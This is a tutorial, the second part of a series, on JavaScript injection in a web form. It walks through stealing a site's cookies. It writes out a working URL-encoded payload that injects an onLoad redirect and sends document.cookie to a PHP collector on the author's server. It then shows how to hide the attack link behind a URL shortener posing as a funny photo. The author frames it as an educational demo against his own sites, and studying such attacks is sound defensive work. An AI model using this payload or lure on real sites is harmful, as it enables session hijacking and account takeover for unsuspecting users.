Javascript Injection (Part 2: How Hackers Steal Cookie Data)
So how can a seemingly small coding oversight lead to any real security issues? Well let's take a closer look.
Let's imagine a scenario...
There is a fairly popular site called TakeTwoApps.com (This is also my site, and this is only a demo for educational purposes!) Now, a lot of people have an account there, and as it so happens, so do you. One day I was just looking around at TakeTwoApps.com, and reading through the site's source code, just seeing how it's put together. TakeTwoApps.com has many interesting features, but I noticed something while looking over the source code of a routine homepage customization form. This form is located here.
Now, before I begin to explain how to exploit this vulnerability, I want to make it clear that you don't have to use this form in order for your account to become compromised. In fact, you don't even have to know it exists. What matters is that I know it's there, and I'm going to try and use it to steal your TakeTwoApps.com cookie data and possibly obtain information that will help me gain access to your TakeTwoApps account.
OK, so let's begin. In the last section we saw how sometimes it's possible to inject Javascript code into a page in a way that it wasn't intended. For the previous example I simply injected an alert() function. This function was placed into the page's <body> tag using onLoad. This simply tells the page to run the alert function when the page loads.
So how can we exploit this further? Well, what else can we do when the page loads? We also saw previously that we can use this vulnerability to force the compromised form to redirect to a site of our choosing.
Let's now take another look at the alert() function. Javascript has a nice and easy way to read a cookie. But a site can only read cookie data for it's own domain. A page on www.tropicalpcsolutions.com can not read cookie data from www.taketwoapps.com, or any other site for that matter. So let's use this Javascript feature to read the cookie data set by us here at TPCS. Note: TPCS doesn't set any cookies, so you will only see an empty alert box. However, just go around the web and when you're at a site, type this into your browser's address bar (and hit enter) to easily see what cookie data they set:
javascript:alert(document.cookie);
Now click here to see what cookie data TPCS has set on your computer. Actually, we don't set cookies so you will just see an empty alert box. But if you want, you can click here and we'll place a small cookie. Then click here to see what the cookie data is. OK, now we know how to get a site to read it's own cookie data. Any site can read it's own cookie data, so a script running on TakeTwoApps.com can easily access the cookie data set by TakeTwoApps.com - So how can we exploit this further?
Let's put these different ideas together. I'm going to inject some code that will force the compromised page at TakeTwoApps to read it's own cookie data, then force a redirect. Where to? It just so happens that I wrote some PHP code to help me grab the cookie data. This program can be found here. So I'm going to force the compromised form at TakeTwoApps to redirect to my cookie monster program. Here is the actual code I will use:
%22white%22%20onLoad=location.replace(%22http://www.tropicalpcsolutions.com/php/cookiemonster.php?%22%2Bdocument.cookie)
By entering this code into the color form, instead of just a color, we can force TakeTwoApps.com to actually inject this code into it's <body> tag, and it will run when the page loads. What does this code actually do? Well, in short, this Javascript code simply tells TakeTwoApps.com to grab the current users cookie data and append it to a web URL. This URL points to a PHP file on my server made for just this purpose. It then forces the redirect.
So now that this is all in place, how will I use this vulnerability to steal your data? I will try to trick you into loading this code into this compromised form at TakeTwoApps.com without you knowing it.
Once again, you do NOT have to even know this form exists to be vulnerable. So let's break down the actual web request into it's two parts:
- This is the actual web address (URL) of the compromised form at TakeTwoApps.com:
http://www.taketwoapps.com/php/js-attack/pick-a-color-example.php
- This is the Javascript code I will trick you into injecting into the page:
%22white%22%20onLoad=location.replace(%22http://www.tropicalpcsolutions.com/php/cookiemonster.php?%22%2Bdocument.cookie)
Now, not many people would click on a link that looked like:
http://www.taketwoapps.com/php/js-attack/pick-a-color-example.php?color=%22white%22%20onLoad=location.replace(%22http://www.tropicalpcsolutions.com/php/cookiemonster.php?%22%2Bdocument.cookie)
But most people, when approached carefully, would click on:
http://tinyurl.com/really-funny-photo
So let's get back to our imagined scenario. You have an account at TakeTwoApps.com. I found a vulnerability at that site that you know nothing about. I'm going to try and exploit this to steal your TakeTwoApps cookie data. So, click here for a really funny picture, I had to LOL when I saw it!
http://tinyurl.com/really-funny-photo
|
|
